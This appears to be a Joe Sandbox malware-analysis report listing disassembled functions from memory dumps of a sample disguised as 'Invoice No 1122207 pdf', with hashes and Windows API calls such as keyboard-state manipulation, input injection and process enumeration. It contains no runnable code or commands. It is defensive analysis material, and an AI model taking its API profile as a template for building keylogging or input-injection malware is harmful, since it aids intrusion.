Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 42d8a671c9e0dea82dfdaa88628f17149bc70e7fda7e18c5f1127a4de40f3cb9
Instruction ID: 5838e8bb0a7c4d6a5d4fc4d59643e5c8a4caa6b83900d64a435e38f72263d2ed
Opcode Fuzzy Hash: 42d8a671c9e0dea82dfdaa88628f17149bc70e7fda7e18c5f1127a4de40f3cb9
Instruction Fuzzy Hash: B041E334600201AFDB20AF25C886F667BE5AB44708F54C45DF91A8F3D3D77AED828B94

Function 0044B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 827480882dd9c1f8c197c620b9e981d251778628a1b402f35e200e47cb506d8b
Instruction ID: dd47dff0d69632b1fc069f2b275dbdf994a5d5a1e7ba879f1174c8a7cf57d6d5
Opcode Fuzzy Hash: 827480882dd9c1f8c197c620b9e981d251778628a1b402f35e200e47cb506d8b
Instruction Fuzzy Hash: 21411571A00704BFE7249F39CC42BAABBA9EB88714F10852FF555DB292D379E90187D4

Function 004856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00485783
GetLastError.KERNEL32(?,00000000), ref: 004857A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004857CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004857FA

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 5f0f4c100b1a50d0fc1f14d23f28f5df87dd9aa909db56d5ac9ec0e2c783b0c0
Instruction ID: 1e1c1169006bbf6b6143515db2d0c20cab159cc2f3de8a0992a1fa34eb0b59a9
Opcode Fuzzy Hash: 5f0f4c100b1a50d0fc1f14d23f28f5df87dd9aa909db56d5ac9ec0e2c783b0c0
Instruction Fuzzy Hash: 15414135600610DFCB11EF15C484A5EBBF2EF49318B18C89AE84A5B361CB38FD41CB95

Function 0044D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00436D71,00000000,00000000,004382D9,?,004382D9,?,00000001,00436D71,?,00000001,004382D9,004382D9), ref: 0044D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0044D9AB
__freea.LIBCMT ref: 0044D9B4

Part of subcall function 00443820: RtlAllocateHeap.NTDLL(00000000,?,004E1444,?,0042FDF5,?,?,0041A976,00000010,004E1440,004113FC,?,004113C6,?,00411129), ref: 00443852

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: db6fc114a5125d9c4aeb1be850741bfce174e58f50b987c98a5e3acc735e1d1d
Instruction ID: e8bde2569c75b5926976a0984e8d8c2a6f801f9ae542add750c0619c37f1fac0
Opcode Fuzzy Hash: db6fc114a5125d9c4aeb1be850741bfce174e58f50b987c98a5e3acc735e1d1d
Instruction Fuzzy Hash: 9231CDB2A0020AABEF249F65DC81EAF7BA5EF41710F05016AFC04D6290EB39CD50CB94

Function 004A52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 004A5352
GetWindowLongW.USER32(?,000000F0), ref: 004A5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004A5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004A53A8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: cac88b56cb4744f60406c7bb9657527409bd96b5b70ef398f1faf8076d212c98
Instruction ID: 5e8ae4d23a4f02b47f2ee34d72c6edb614801b4ce34adc7abb237c8f3a33946b
Opcode Fuzzy Hash: cac88b56cb4744f60406c7bb9657527409bd96b5b70ef398f1faf8076d212c98
Instruction Fuzzy Hash: F231E430A55A08FFEF309E14DE45BEA3761ABA6390F584113FE11962E1C7B89D40DB4A

Function 0047AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 0047ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0047AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0047AC74
SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 0047ACC6

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2e85973924a3b6836fea5be79c1db061b3275b2a578a557089be282fa5378c83
Instruction ID: 9b7cd69b858423b3bd1728dbb7ac65d4c7f4aa9068d8a61e12e4371e9a0aec77
Opcode Fuzzy Hash: 2e85973924a3b6836fea5be79c1db061b3275b2a578a557089be282fa5378c83
Instruction Fuzzy Hash: E031F830A006187FEF36CB658809BFF7BA5ABC5310F04C21BE489522D1C37D89A5879B

Function 004A7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004A769A
GetWindowRect.USER32(?,?), ref: 004A7710
PtInRect.USER32(?,?,004A8B89), ref: 004A7720
MessageBeep.USER32(00000000), ref: 004A778C

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: ad9f01b04d0407ebe58d1bd6a8efa648627726e7214698e0dfb4ece4a22d255d
Instruction ID: 281c847e5ef4d4bb3d3a3a44e00c7075ba0e0596c4a0cda96c2079c6931409f3
Opcode Fuzzy Hash: ad9f01b04d0407ebe58d1bd6a8efa648627726e7214698e0dfb4ece4a22d255d
Instruction Fuzzy Hash: 0D419F78605254DFCB21CF58CC94EAA77F4BB5A314F1541AAE4149B362C738B941CF98

Function 004A16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004A16EB

Part of subcall function 00473A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00473A57
Part of subcall function 00473A3D: GetCurrentThreadId.KERNEL32 ref: 00473A5E
Part of subcall function 00473A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004725B3), ref: 00473A65

GetCaretPos.USER32(?), ref: 004A16FF
ClientToScreen.USER32(00000000,?), ref: 004A174C
GetForegroundWindow.USER32 ref: 004A1752

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: c1dc95facfe6ee1440833f223fb5cfa58ea6465fa3fc6fbec1d51d8f98b5bfc7
Instruction ID: 7f96c364aa62962e8546d8dc61a75a9c9848e96c4e7ba32d5638bef45d9228bd
Opcode Fuzzy Hash: c1dc95facfe6ee1440833f223fb5cfa58ea6465fa3fc6fbec1d51d8f98b5bfc7
Instruction Fuzzy Hash: 73313D75D00249AFC700EFAAC8C18EEBBF9EF49308B5080AAE415E7251D635DE45CBA4

Function 0047D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0047D501
Process32FirstW.KERNEL32(00000000,?), ref: 0047D50F
Process32NextW.KERNEL32(00000000,?), ref: 0047D52F
CloseHandle.KERNEL32(00000000), ref: 0047D5DC

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a311600d44079c0a353e4b97e6172389cd0b7a294917bc1c6603325e74459c8b
Instruction ID: f94cc9343f9b6e6d5958c8450b0b2dfa4962ca403455e7102376e4fbd1840aad
Opcode Fuzzy Hash: a311600d44079c0a353e4b97e6172389cd0b7a294917bc1c6603325e74459c8b
Instruction Fuzzy Hash: 4D31C471108300AFD300EF54C881AEFBBF8EF99348F14492EF585821A1EB759988CB96

Function 004A8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00429BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00429BB2

GetCursorPos.USER32(?), ref: 004A9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00467711,?,?,?,?,?), ref: 004A9016
GetCursorPos.USER32(?), ref: 004A905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00467711,?,?,?), ref: 004A9094

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 92e249b46de13416d1d93ccc39a885b4193c78241ceac73206379186a51af7de
Instruction ID: 935d4800c79c01b11d80747103308528a3e2cbb5f504a3cd88e748a6b9cab65d
Opcode Fuzzy Hash: 92e249b46de13416d1d93ccc39a885b4193c78241ceac73206379186a51af7de
Instruction Fuzzy Hash: 4B219F35604018FFCB258F94D898EEB7BB9EB4A390F14806AF9054B262C3399D90DB64

Function 0047D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,004ACB68), ref: 0047D2FB
GetLastError.KERNEL32 ref: 0047D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0047D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004ACB68), ref: 0047D376

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 2cbf998efb7b84d7c9b93faf74577725f69a0ba50cd196103bfbaaf45d0c1633
Instruction ID: a93264fde7d96f01c7be7b17843a0f24cf62a776a4c71e9b68568ef6115461f8
Opcode Fuzzy Hash: 2cbf998efb7b84d7c9b93faf74577725f69a0ba50cd196103bfbaaf45d0c1633
Instruction Fuzzy Hash: E72194709142019F8700DF24C8814EB77F4AE56368F108A1FF899C72A1DB35DD46CB9B

Function 00471571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00471014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0047102A
Part of subcall function 00471014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00471036
Part of subcall function 00471014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00471045
Part of subcall function 00471014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0047104C
Part of subcall function 00471014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00471062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004715BE
_memcmp.LIBVCRUNTIME ref: 004715E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00471617
HeapFree.KERNEL32(00000000), ref: 0047161E

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 67ddbd88e4e5af09870c64dc9d6605923ecca63a1c17edca9303cd8587e4c3c5
Instruction ID: d9dfff3dabab45ceb8714f1668bca5812e270d89e350ba0174a533abbe99d602
Opcode Fuzzy Hash: 67ddbd88e4e5af09870c64dc9d6605923ecca63a1c17edca9303cd8587e4c3c5
Instruction Fuzzy Hash: 2921AE71E00108EFDF04DFA8C944BEFB7B8EF45344F18845AE445AB250E734AA04DB94

Function 004A2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 004A280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004A2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004A2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004A2840

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: dcb0d5f4f394f52609b3c722c7e2f4a3a52b9a94eaec35136a340e08ae2d89c5
Instruction ID: db56252bdc6e01d2df789c08ab52efa053a809606eb9348d55a1efcbf3e682fd
Opcode Fuzzy Hash: dcb0d5f4f394f52609b3c722c7e2f4a3a52b9a94eaec35136a340e08ae2d89c5
Instruction Fuzzy Hash: 6A212735204510BFD7149B18C944FAA7B95EF56328F14421EF4268B2D2C7B9FC82C7D4

Function 004778F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00478D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0047790A,?,000000FF,?,00478754,00000000,?,0000001C,?,?), ref: 00478D8C
Part of subcall function 00478D7D: lstrcpyW.KERNEL32(00000000,?,?,0047790A,?,000000FF,?,00478754,00000000,?,0000001C,?,?,00000000), ref: 00478DB2
Part of subcall function 00478D7D: lstrcmpiW.KERNEL32(00000000,?,0047790A,?,000000FF,?,00478754,00000000,?,0000001C,?,?), ref: 00478DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00478754,00000000,?,0000001C,?,?,00000000), ref: 00477923
lstrcpyW.KERNEL32(00000000,?,?,00478754,00000000,?,0000001C,?,?,00000000), ref: 00477949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00478754,00000000,?,0000001C,?,?,00000000), ref: 00477984

Strings

cdecl, xrefs: 0047797B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 81b95e1ccd0325cbcf6599b88682cf03fd47b9345b772c64a16d4d28d3ead0b2
Instruction ID: f817beb4e83c21496eaef826c97270e96265de037aa7a0ba54ec5e5f834742d1
Opcode Fuzzy Hash: 81b95e1ccd0325cbcf6599b88682cf03fd47b9345b772c64a16d4d28d3ead0b2
Instruction Fuzzy Hash: 961106BA201201ABDB259F35D844EBB77A9FF95354B90802FF90AC7364EB359801C799

Function 004A7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 004A7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 004A7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004A7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0048B7AD,00000000), ref: 004A7D6B

Part of subcall function 00429BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00429BB2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 4d116b3a2b0ef00409dc8062ed860a11a21c4d6f944aa111f0220a360637a86c
Instruction ID: 2ff3fdd6f282687191af6c6a1e9b2827e79318cc6051e5ebe701b8a412397121
Opcode Fuzzy Hash: 4d116b3a2b0ef00409dc8062ed860a11a21c4d6f944aa111f0220a360637a86c
Instruction Fuzzy Hash: 2711D271604664AFCB209F28CC44EAA3BA4BF46360B154325F835CB2F0D7349D11CB48

Function 004A5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 004A56BB
_wcslen.LIBCMT ref: 004A56CD
_wcslen.LIBCMT ref: 004A56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 004A5816

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 40fbca56e91c3880ad024139c5cd30f0f34810fba1066e50c22e1c13d253272d
Instruction ID: 93121e1a561321c9f23ce53c36f06316e67adc567e77f579c6c7e89628b9b1c7
Opcode Fuzzy Hash: 40fbca56e91c3880ad024139c5cd30f0f34810fba1066e50c22e1c13d253272d
Instruction Fuzzy Hash: 8111E47160060496DB20DF618D81AEF377CBF26364F10402BF905D6181EB789984CB69

Function 00441D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693c1b9348d53e0b407e5a73963cad68b971c5e093a46b6d6118ecbda7eda00f
Instruction ID: 9c390f9af195b6f70818d3e09ce3d1c66d0ad593979d0d7e4b33f55b196544e3
Opcode Fuzzy Hash: 693c1b9348d53e0b407e5a73963cad68b971c5e093a46b6d6118ecbda7eda00f
Instruction Fuzzy Hash: C101A2F2B056163EF62116796CC0F27661DDF423B8B34032BF531512E2DB78AC814178

Function 00471A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00471A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00471A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00471A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00471A8A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

